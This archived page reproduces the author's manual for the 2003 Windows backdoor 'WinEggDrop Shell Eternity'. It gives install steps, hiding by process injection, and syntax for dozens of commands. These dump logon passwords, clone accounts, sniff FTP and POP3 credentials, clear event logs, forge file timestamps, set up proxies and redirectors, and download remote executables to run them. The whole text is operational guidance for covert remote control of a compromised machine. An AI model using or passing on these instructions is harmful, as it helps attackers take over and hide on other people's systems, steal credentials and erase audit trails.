WinEggDrop Shell Eternity
Released 20 years, 10 months ago. November 2003
Copyright © MegaSecurity
By WinEggDrop
Informations
| From | China |
| Author | WinEggDrop |
| Family | WinEggDrop Shell |
| Category | Remote Access |
| Version | WinEggDrop Shell Eternity |
| Released Date | Nov 2003, 20 years, 10 months ago. |
Author Information / Description
WinEggDrop Shell Eternity Version
Backdoor Class: A telnetd backdoor(only work on NT system)
Advance(Compare to the same class backdoor)
1.Competitively Small.Even the server is near 80k after compression,it's still "small"
comparing to its features and to the similar backdoor
2.Many many features(some are unique)
A.Process Management-->view and kill processes(abile to kill process by PID or ProcessName)
B.Registry Management(delete,set,add,view Key or keyname)
C.Service management(stop,start,enum,config and delete service)
D.TCP/IP Process to Port Mapper(similar to fport.exe)
E.Reboot,showdown,poweroff and logoff
F.Sniffing(able to sniff ftp or pop3 password)
G.install terminal service on win 2k server system
H.Multi-thread port redirector(able to specify connection IP Range)
I.Multi-thread HTTPD(able to specify connection IP Range)
J.Sock5 Proxy(Two different auth methods,able to specify connection IP Range)
K.Clone system accounts,and check Cloned accounts
L.Findpassword(able to view all logon account's password on NT 4.0 or Win 2K,even cloned accounts)
M.TCP/IP Filtering
N.FTP basic client with unique features(resume supported,search files in ftp server,mass get,mass del,mass send and so more)
O.FTP server(use only two ports,resume supported)
P.HTTP Proxy(Full Anonymous,Support oicq,icq,msn,mirc and so more applications supporting http proxy)
Q.other features such as http downloader(resume supported),clear logs,get system info,restore common file associations
,enumerate system accounts and so more
3.Online help with examles(which means you can get help as you connect to the backdoor,such as you know there is command named
ftpserver,but you forget the syntax,so you can just enter ftpserver as you connect to the backdoor,and the syntax and example
will be shown)
4.No process shown on the task management because the backdoor is injected into other process for running
5.Self-protection(protect the service and the injector being deleted and modified)
Eternity Version
1.Add FTP Server
2.Add check cloned account
3.Add search file,mass get,mass send,mass del in ftp basic client
4.Add HTTP Proxy
5.Sock5 proxy,sniff,http proxy and ftp server is able to run as backdoor is loaded
6.Add feature to show the system default languate
7.Modify some code on sock5 proxy
8.No new service is added as installing terminal service
9.Fix Fport code
10.Tons of mini modifications in the code
Eternity Version All Features(Commands)
1.Pslist Feature:List processes
2.ListIP Feature:List all IPs
3.ShowSID Feature:List accounts' SID
4.Fport Feature:TCP/IP Process to Port Mapper
5.Online Feature:List all IPs connected to the backdoor
6.WhoIsShell Feature:List the IP which has got the shell
7.ShowName Feature:List account by registry
8.Reboot Feature:Reboot
9.ShutDown Feature:ShutDown
10.Logoff Feature:Logoff
11.PowerOff Feature:Poweroff
12.Shell Feature:Get a shell
13.Stopbackdoor Feature:Stop The BackDoor,but you are unable to delete the backdoor's dll file
14.pskill Feature:Kill process
15.Never Feature:Set an account's logon time to zero
16.DirFile Feature:List all files in current directory
17.DelFile Feature:Delete a file
18.Execute Feature:Execute a program
19.Http://IP/�ļ� Feature:Download file
20.Installterm Feature:Install terminal service
21.Clone Feature:Clone an account
22.Send Feature:Send message to the buddies who also connect to the backdoor
23.Exit Feature:Quit the backdoor
24.OffShell Feature:Kick the one who has got the shell
25.Help Feature:Show help
26.Disconnect Feature:Disconnect other connector
27.StopService Feature:Stop a service
28.StartService Feature:Start a service
29.DeleteService Feature:Delete a service
30.CleanEvent Feature:Clean logs
31.TerminalPort Feature:view or set terminal service port
32.Redirect Feature:Port redirector
33.ViewThreads Feature:View Port redirector information
34.KillThreads Feature:Kill one port redirector thread
35.EnableFilter Feature:Enable TCP/IP filtering
36.DisableFilter Feature:Disable TCP/IP filtering
37.FilterInfo Feature:View TCP/IP filtering status
38.AR Feature:Restore common file association
39.GetUser Feature:List all system accounts
40.ViewPath Feature:View current path
41.SetPath Feature:Set current path
42.SID Feature:View local or remote system's SID
43.ViewTimeOut Feature:View timeout
44.SetTimeOut Feature:Set timeout
45.StartSniffer Feature:Start sniffing
46.StopSniffer Feature:Stop sniffing
47.ViewSniffer Feature:View sniffing status
48.Sysinfo Feature:View system information
49.ViewService Feature:Query a service's information
50.ConfigService Feature:Config a service start type
51.ViewKey Feature:View run and runservics startup keys in registry
52.DelKey Feature:Delete a key from run and runservices in registry
53.EnumService Feature:Enumerate all services information matching the start type as auto
54.RegEedit Feature:Enter registry management mode
55.Findpassword Feature:Retrieve all logon account's password
56.ExitShell Feature:Return from shell mode to pre-shell mode
57.StartProxy Feature:Start sock5 proxy
58.StopProxy Feature:Stop sock5 proxy
59.ViewProxyInfo Feature:View sock5 proxy information
60.HTTPServer Feature:start httpd
61.KillHttpServer Feature:Kill one of httpd thread
62.ViewHTTPInfo Feature:View httpd information
63.Filter Feature:Enter TCP/IP filtering mode
64 FTP Feature:Enter FTP client mode
65.ViewFTPInfo Feature:View FTP client thread information
66.FTPServer Feature:Start ftp server
67.DeleteFTPSetting Feature:Delete ftp server settings
68.DeleteProxySetting Feature:Delete sock5 proxy settings
69.DeleteSnifferSetting Feature:Delete sniffing settings
70.FileTime Feature:Modify file time
71.KillFTPD Feature:Kill a connection from ftp server
72.CheckClone Feature:Check cloned accounts
73.StartHTTPProxy Feature:Start HTTP Proxy
74.ViewHTTPProxyInfo Feature:View HTTP Proxy Info
75.StopHTTPProxy Feature:Stop HTTP Proxy
76.DeleteHTTPProxySetting Feature:Delete HTTP Proxy Settings
77.Shield Feature:Start The Backdoor's self-protection
78.UnShield Feature:Stop The Backdoor's self-protection
79.ViewFile Feature:View Ascii File Content
How to run the backdoor
1.configure injectt.exe
2.upload injectt.exe and TBack.DLL to winnt\system32
3.run "injectt.exe -run" to install the backdoor as service and start the backdoor
The below commands is used when you already connect to the backdoor,pass the authorization
and you are in rre-shell mode(when you see [Melody],here is the pre-shell mode)
Eternity Version all Commands' syntax
1.Pslist Feature:List processes
Example:pslist
2.ListIP Feature:List all IPs
Example:ListIP
3.ShowSID Feature:List accounts' SID
Example:ShowSID
4.ShowName Feature:List account by registry
Example:ShowName
5.Fport Feature:TCP/IP Process to Port Mapper
Example:Fport
Notice: The system running hxdef V0.84 with this backdoor's port hidden will affect this feature.Thus,you'd beeter use
mport or fport to replace this feature.Since the side effect of hxdef causes this problem,it's not a bug of
the backdoor at all.Fortunately,the failure of this feature won't crash the backdoor.
6.Online Feature:List all IPs connected to the backdoor
Example:Online
7.WhoIsShell Feature:List the IP which has got the shell
Example:WhoIsShell
8.Reboot Feature:Reboot
Example:Reboot
9.ShutDown Feature:ShutDown
Example:ShutDown
10.Logoff Feature:Logoff
Example:Logoff
11.PowerOff Feature:Poweroff
Example:PowerOff
12.Shell Feature:Get a shell
Example:Shell
13.Stopbackdoor Feature:Stop The BackDoor
Example:Stopbackdoor
14.Help Feature:Show help
Example:Help
15.Exit Feature:Quit the backdoor
Example:Exit
16.pskill PID or ProcessName Feature:Kill process
Example:pskill 1234
Example:pskill notepad
17.Never Account Feature:Set an account's logon time to zero
Example:Never Guest
Example:Never Administrator
18.DirFile FileName Feature:List all files in current directory
Example:DirFile *.exe
19.DelFile FileName Feature:Delete a file
Example: DelFile a.txt
20.Execute ProgramToRun Feature:Execute a program
Example:Execute abc.exe
Example:Execute net.exe user test test
21.Http://IP/FileName SaveFileName Feature:Download file
Example:http://11.11.11.11/a.exe a.exe
Example:http://www.mysite.com/a.exe a.exe
Example: http://www.mysite.com:81/a.exe a.exe
22.Installterm Port Feature:Install terminal service
Example:Installterm 3345
23.Clone Account AccountToClone Password Feature:Clone an account
Example:Clone Admin Guest test
24.Send All Message Feature:Send message to the buddies who also connect to the backdoor
Example:Send all Hello
25.OffShell Feature:Kick the one who has got the shell
Example:OffShell
26.Disconnect Feature:Disconnect other connector
Example:Disconnect ThreadNumber ->Kick someone
Example:Disconnect All ->Kick all but you
27.StopService Feature:Stop a service
Usage:StopService ServiceName
Example:StopService w3svc
Example:StoptService windows service
28.StartService Feature:Start a service
Usage:StartService ServiceName
Example:StartService w3svc
Example:StartService windows service
29.DeleteService Feature:Delete a service
Usage:DeleteService ServiceName
Example:DeleteService Windows Service
Example:DeleteService test
30.CleanEvent Feature:Clean logs
Example:CleanEvent
Remove Application,Security and System log
31.TerminalPort Feature:view terminal service port
Example:TerminalPort
31A.TerminalPort Feature:set terminal service port
Example:TerminalPort Port
32.Redirect Feature:Port redirector
Usage:Redirect SourcePort RemoteHost RemotePort [AllowedIP]
Example:Redirect 2222 12.12.12.12 3333
Example:Redirect 2222 www.abc.com 3333 12.12.*.*
33.ViewThreads Feature:View Port redirector information
Example:ViewThreads
34.KillThreads Feature:Kill one port redirector thread
Example:KillThreads ThreadNumber
35.EnableFilter Feature:Enable TCP/IP filtering
Example:EnableFilter
36.DisableFilter Feature:Disable TCP/IP filtering
Example:DisableFilter
37.FilterInfo Feature:View TCP/IP filtering status
Example:FilterInfo
38.AR Feature:Restore common file association
Example:AR
39.GetUser Feature:List all system accounts
Example:GetUser
40.ViewPath Feature:View current path
Example:ViewPath
41.SetPath Feature:Set current path
Example:SetPath Ŀ¼
42.SID Feature:View local or remote system's SID
Usage:SID Local|IP
Example:SID Local view Local system SID
Example:SID 12.12.12.12 View Remote system SID
43.ViewTimeOut Feature:View timeout
Example:ViewTimeOut
44.SetTimeOut Feature:Set timeout
Example:SetTimeOut Time(in second)
45.StartSniffer Feature:Start sniffing
Usage:StartSniffer NIC
Example:StartSniffer 0
Note:ListIP feature can view all the NIC
46.StopSniffer Feature:Stop sniffing
Example:StopSniffer
47.ViewSniffer Feature:View sniffing status
Example:ViewSniffer
48.Sysinfo Feature:View system information
Example:Sysinfo
49.ViewService Feature:Query a service's information
Usage:ViewService ServiceName
Example:ViewService Norton Antivirus Server
50.ConfigService Feature:Config a service start type
Usage:ConfigService StartType ServiceName
Example:ConfigService Auto W3svc -->Set service start type to auto
Example:ConfigService Demand w3svc -->Set service start type to manual
Example:ConfigService Disable w3svc -->Set service start type to disable
51.ViewKey Feature:View run and runservics startup keys in registry
Example:ViewKey
52.DelKey Feature:Delete a key from run and runservices in registry
Usage:DelKey KeyName
Example: DelKey radmm
Example: DelKey Tk BellExe
53.EnumService Feature:Enumerate all services information matching the start type as auto
Example:EnumService
54.RegEedit Feature:Enter registry management mode
Example:RegEdit
When you enter the regiedit mode,you can use the any commands below:
DirValue Feature:List all current key's value
DirKey Feature:List all current keys
CD.. Feature:One level back
Root Feature:Return to the root(hklm)
Exit Feature:Quit regedit mode
Help Feature:Show help
CD KeyName Feature:Switch Keyname
DelValue ValueName Feature:Delete a value
DelKey KeyName Feature:Delete a Key
Set Type ValueName Value Feature:Add a value
Example: set REG_SZ "Test Value" hook.exe
Type: REG_SZ,REG_DWORD,REG_MUL_SZ,REG_EXPAND_SZ
SwitchRoot RootName Feature:Switch The Registry Root Key
The Registry has five branches,HKEY_CLASSES_ROOT(HKCR),HKEY_CURRENT_USER(HKCU),HKEY_LOCAL_MACHINE(HKLM),
HKEY_USERS(HKU) and HKEY_CURRENT_CONFIG(HKCC).The RootName is one of HKCR,HKCU,HKLM,HKU or HKCC.The most
common branch is the HKLM branch.When you enter the registry management mode,the default branch is set to
HKLM,so if you want to view or modify registry values other than HKLM branch,you need to use this command
to jump to other branch before processing any operations
Example:SwitchRoot HKCU --> Jump to HKEY_CURRENT_USER branch,any operations will base on this branch
55.Findpassword Feature:Retrieve all logon account's password
Example:Findpassword
56.ExitShell Feature:Return from shell mode to pre-shell mode
Example:ExitShell
57.StartProxy Feature:Start sock5 proxy
Usage: StartProxy [UserName] [Password] Port AllowedIP
A.[UserName] And [Password] are optional,if they are omitted,then no authorization
Example: StartProxy 12345 All -->Proxy port is 12345,no authorization and allow all IP to connect
Example: StartProxy Guest test 12345 All -->Proxy port is 12345,need authorization,and allow all IP to connect
Example: StartProxy 12345 211.11.*.* -->Proxy port is 12345,no authorization��and IP beginning with 211.11 can connect
Example: StartProxy Abc abc 12345 12.12.*.* -->Proxy port is 12345,need authorization��and IP beginning with 12.12 can connect
58.StopProxy Feature:Stop sock5 proxy
Example: StopProxy
59.ViewProxyInfo Feature:View sock5 proxy information
Example:ViewProxyInfo
60.HTTPServer Feature:start httpd
Usage:HTTPServer RootDir Port [AllowedIP]
Note:RootDir must exist
Example: HTTPServer C:\ 82 -->Http server port is 82,RootDir=c:\ allow all IP to connect
Example2: HTTPServer c:\test 100 12.12.12.12 -->HTTP Server Port is 100,RootDir=c:\test,allow IP 12.12.12.12 to connect
61.KillHttpServer Feature:Kill one of httpd thread
Example: KillHttpserver 1
62.ViewHTTPInfo Feature:View httpd information
Example:ViewHttpInfo
63.Filter Feature:Enter TCP/IP filtering mode
When entering TCP/IP filtering mode,you can use any commands below:
A.Restore Feature:Restore the settings
Example:Restore
B.ShowTCP Feature:Show TCP protocol filtering information
Example: ShowTCP
C.ShowUDP Feature:Show UDP protocol filtering information
Example: ShowUDP
D.ShowALL Feature:Show TCP and UDP protocols filtering information
Example: ShowALL
E.ListIP Feature: List all IP and NIC
Example: ListIP
F.EnableFilter Feature:Enable TCP/IP filtering
Example: EnableFilter
G.DisableFilter Feature:Disable TCP/IP filtering
Example: DisableFilter
H.Exit Feature:Quit TCP/IP filtering mode
Example: Exit
I.SetTTL Feature: Set system TTL value
Usage: SetTTL Number(The number is between 0 and 255)
Example: SetTTL 240
J.Set Feature: Set the filtering port
Usage: Set TCP/UDP PortList ALL/NIC
Example: Set TCP 80;139;445; 0
Example: Set TCP 12345; 0
Example: Set TCP 80; All
Example: Set UDP 135; 0
K.Add Feature: Add the filtering port
Usage: Add TCP/UDP PortList All/NIC
similar to set command above
64:FTP Feature:Enter FTP client mode
You can use any commands below as you enter FTP client mode
A.Dir [FileName] Feature: Display ftp current directory file
Example:Dir
Example:Dir *.exe
B.CD.. Feature: One directory up
Example:CD..
C.CD Directory Feature: Switch Directory
Example: CD Winnt
D.Root Feature: Return to root Directory
Example: Root
E.Exit Feature: Quit FTP client mode
Example: Root
F.Help Feature: Show help
Example: Help
G:Del FileName Feature: Delete File on ftp server
Example: Del abc.exe
H:RKDir Directory Feature: Delete a directory on ftp server
Example:RKDIR abc
I:MKDIR Directory Feature: Create a directory on ftp server
Example:MKDIR abc
J:REN OldFileName NewFileName Feature: Rename a file on ftp server
Example:REN abc.exe bb.exe
K:Get FileName [NewFileName] Feature: Download a file from ftp server
Example:Get abc.exe trojan.exe
Example:Get abc.exe
L:Send FileName [NewFileName] Feature: Upload a file to ftp server
Example: Send trojan.exe abc.exe
Example: Send trojan.exe
M:PD Feature: List current path on ftp server
Example:PD
O:Connect FTPAddress Port User Pass Feature: Connect to ftp server
Example:Connect 12.12.12.12. 21 test test
P:Close Feature: Close current ftp session
Example:Close
Q:DirFile [FileName] Feature: List current path file on local system(the system running the backdoor)
Example:DirFile
Example:DirFile *.exe
R:ViewPath Feature: View current path on local system(the system running the backdoor)
Example:ViewPath
S:SetPath Path Feature: Set current path on local system
Example:SetPath c:\winnt
T:ViewFTPInfo Feature: View ftp thread information
Example:ViewFTPInfo
U:KillThread Feature: Kill a ftp thread
Example:KillThread 1
V.ResetFTP Feature: Kill all active ftp thread
Example:ResetFTP
W.FTPCommand Feature: Send ftp command
Example:FTPCommand TYPE I
Example:FTPCommand PASV
AA.MassGet Feature: Mass get files from ftp server
Example:MassGet *.rm
BB.MassSend Feature: Mass send files to ftp server
Example:MassSend *.exe
CC.MassDel Feature: Mass delete files on ftp server
Example:MassDel *.exe
DD.FindFile Feature: Search files on ftp server
Example:FindFile *.rm
65.ViewFTPInfo Feature:View FTP client thread information
Example:ViewFTPInfo
66.FTPServer Feature:�������ű����ڽ�FTP����
Usage:FTPServer ControlPort BindPort User Pass RootDir AllowedIP [Access]
arguements meanings:
1.ControlPort -->The listening port of the ftpd
2.BindPort -->the data connection port using pasv mode(only use the port for Pasv connection).
If this port is 0,then the system will automatically allocate a port for it.
3.User -->User Name for login the ftpd
4.Pass -->pasword for login the ftpd
5.RootDir -->the default root directory
6.AllowedIP -->the IP allowd to connect to the ftpd
7.Access -->Access String
Access String:
R represents Read Access(download access)
W represents Write Access(upload,rename,move)
L represents List Access(list file)
C represents Create Access(Create Directory on the ftpd)
D represents Delete Access(Delete File/Directory on the ftpd)
U represents Unlock Access(Unlock the user from the root directory,the user can
browse all the files in all hard disks)
Access String is the combination of the above six Access.If the access
arguement is omitted,the user will gain all the accesses
Examples:
1.ftpserver 21 0 test test c:\win98 all RWLCD
Create a ftpd on port 21,the data connection port is random,user name and password are
test,the root directory is c:\win98,allows all IP to connect this ftpd.The connected
user will have Read,Write,List,Create,Delete Access.
2.ftpserver 21 9 test test c:\ 12.12.*.*
Crate a ftpd on port 21,the data connection port is random,user name and password are
test,the root directory is c:\,allowed all IP beginning with 12.12 to connect.The connected
user will have all access(Read,Write,List,Create,Delete,Unlock Access)
3.ftpserver 21 55555 test test c:\win98 all
Create a ftpd on port 21,the data connection port is 55555,user name and password are
test,the root directory is c:\win98,allows all IP to connect this ftpd.The connected
user will have all access(Read,Write,List,Create,Delete,Unlock Access).
4.ftpserver 21 55555 test test c:\win98 all LRU
Create a ftpd on port 21,the data connection port is 55555,user name and password are
test,the root directory is c:\win98,allows all IP to connect this ftpd.The connected
user will have Read,List And Unlock Access
5.ftpserver 21 55555 test test c:\win98 all LRW
Create a ftpd on port 21,the data connection port is 55555,user name and password are
test,the root directory is c:\win98,allows all IP to connect this ftpd.The connected
user will have Read,List And Write Access
6.ftpserver 21 55555 test test c:\win98 all LR
Create a ftpd on port 21,the data connection port is 55555,user name and password are
test,the root directory is c:\win98,allows all IP to connect this ftpd.The connected
user will have Read and List access.
7.ftpserver 21 0 test test c:\win98 all LR
Create a ftpd on port 21,the data connection port is random allocated by the sytsem,
user name and password are test,the root directory is c:\win98,allows all IP to connect
this ftpd.The connected user will have Read and List access.
Notes: The Unlock access is the most dangerous access since the login user can browse all the
disks(floop disk,hard-disk,cd-rom zip disk,and etc).If unnecessary,don't allow this access.
67.DeleteFTPSetting Feature:Delete ftp server settings
Example:DeleteFTPSetting
68.DeleteProxySetting Feature:Delete sock5 proxy settings
Example:DeleteProxySetting
69.DeleteSnifferSetting Feature:Delete sniffing settings
Example:DeleteSnifferSetting
70.FileTime Feature:Modify file time
Usage:FileTime SourceFileName DestFileName
Example:FileTime Write.exe abc.exe
71.KillFTPD Feature:Kill a connection from ftp server
Usage:KillFTPD FTPDSessionNumber
Example:KillFTPD 1
Note:FTPDSessionNumber can be retrieved from the command "viewftpserverinfo"
72.CheckClone Feature:Check cloned accounts
Example:CheckClone
73.StartHTTPProxy Feature:Start HTTP Proxy
Usage:StartHTTPProxy Port [AllowedIP]
Example:StartHTTPProxy 8090
Example:StartHTTProxy 8090 12.12.*.*
74.ViewHTTPProxyInfo Feature:View HTTP Proxy Info
Example:ViewHTTPProxyInfo
75.StopHTTPProxy Feature:Stop HTTP Proxy
Example:StopHTTPProxy
76.DeleteHTTPProxySetting Feature:Delete HTTP Proxy Settings
Example:DeleteHTTPProxySetting
77.Shield Feature:start The Backdoor 's Self-protection
Example:Shield
78.UnShield Feature:Stop The Backdoor's Self-protection
Example:UnShield
79.ViewFile Feature:View Ascii File Content
Example:ViewFile FileName
More detail about TCP/IP filtering's two main commmands(Set and Add)
1.Set and Add both can set a list of filtering port for a specified protocol or all protocol,
and the syntax of both commands is the same,the only difference is set command will overwrite
the original setttings,but add command will only append the new settings to the original
settings.Whatever using either command,the TCP/IP filtering status must be set to be enable,
or the command will fail
2.The list of filtering port must have special order-every port must saparate by a comma.
3.The settings will take effort after reboot
4.If the system is running a commercial ftp server such as serv-u or other kinds,don't use
the TCP/IP filtering feature,or the ftp server will reject the pasv mode connection.
More detail about some features:
1.ExitShell
The command will be used as the user is already in the shell mode,and the command will
switch the user back to pre-shell mode.The command provides a convenient way to switch
between pre-shell mode and shell mode.
2.Cmd Redirector
The feature eases the user to run some system commands in pre-shell mode.
3.Sock5 proxy
Sock5 proxy supports no auth or auth two different methods.Due to the limitation of
intranet,applications with UDP protocol are unlike to use the sock5 proxy unless the
gateway of the intranet is completely fully NAT.Applications with TCP protocol will not
be affected
4.Httpd
The feature can act like a basic http server,but don't expect it can support asp,cgi or other
stuff.This feature only provides users a easy way to create a temporary http server to view or
download files.The httpd supports resume.To view the files,enter http://IP:port format in IE.If
you forget to put http:// before the IP,the operation will fail.To enter unicode directory or download
unicode files,you need to configure a settting in IE.IE->Internet option->Advanced,uncheck "always send
URLs as UTF-8(requires restart)" option,then restart IE.
5.TCP/IP Filtering
The feature provides a way to build a "firewall" on a insecure system,but you must use it properly,or
the system may reject all inbound connections,especially don't use this feature when the system is running
commercial ftp server.
6.FTP client
This feature is indeed a FTP client since it can do more than a standard ftp client but in console
mode and does not support port mode connection. File transfer(download or upload) can support resume if
the ftp server is resumable.Due to the limition of ftp protocol,a ftp session will not receive any commands
as that ftp session is in file transfer status.For example,if you are downloading files from ftp.yoursite.com
,and you want to view files on ftp.yuorsite.com,you must connect to the ftp server one more time.File search
is only tested on serv-u V4.0,slimftpd V3.14 and the backdoor's build-in ftpd.I don't gurantee it will work on
other ftp servers.
7.FTP Server
This is a build-in ftpd,which supports both Pasv and Port modes,supports most basic operations such as
delete,create,download,upload,rename,and fxp is also supported. This ftpd is only to ease the user to transfer
data among computers,so I can't gurantee it will work very well for multi-connection(I know it will work,but I
don't have the condition to test it).This ftpd allows 128 connections at most,and the same IP will be restricted
to login in 5 times at the same time.This ftpd is also designed to support some download utilities like flashget
and nettransport.The most advanced part of this ftpd is it only use two ports for pasv connection no matter how many
connections are logged in and perform file transfer(Usually every user will use a new port to bind locally for data
transfer in 99% ftpd).This design will allow this ftpd to run under some sort of firewalls or routers.Only if the
control port and the data port are allowed for inbound connections,users will have no problem to login in this
ftpd even it's behide firewall or router using pasv mode connection.If you set the data port to 0,then the system will
allocate a port for the ftpd as data transfer is taking place.
Notes: If the box running this ftp server has no firewall,port filtering or something similiar,I recommend using 0 as the
bind port
8.Some features run as the backdoor is loaded
Sock5 proxy,HTTP Proxy,FTPD and sniffing features are the only featurs that can run as the backdoor is loaded.
Every time you use one of these feature,the setting will be saved,and if the system is restarted,the backdoor
will start the features according to the setting.For example,if you login the backdoor and use the command
"startproxy test test 12345",and if the sock5 proxy is successfully created,the setting will be saved,and
when the system is rebooted,the backdoor will create the sock5 proxy as it's loaded.If you don't want the backdoor
to start the feature,you can just simply use the corresponding command to delete the setting.
Others:
1.Thanks for the coder of findpassword.I have no idea who coded it,but the findpassword feature in my backdoor is
based on his/her code.
2.I coded clone account and install terminal service features based on some others' research(unknown researchers,so I don't
know who should take this credit)
3.Fport feature is based on many people source code,and I did modify or re-write it three times.It's pretty stable in this
version.Thanks for those releasing the source code.
WinEggDropIf you recognize any personal information on this page and wish to have it removed or redacted, please contact us at jplesueur@phrozen.io. We are committed to protecting your privacy in accordance with GDPR regulations.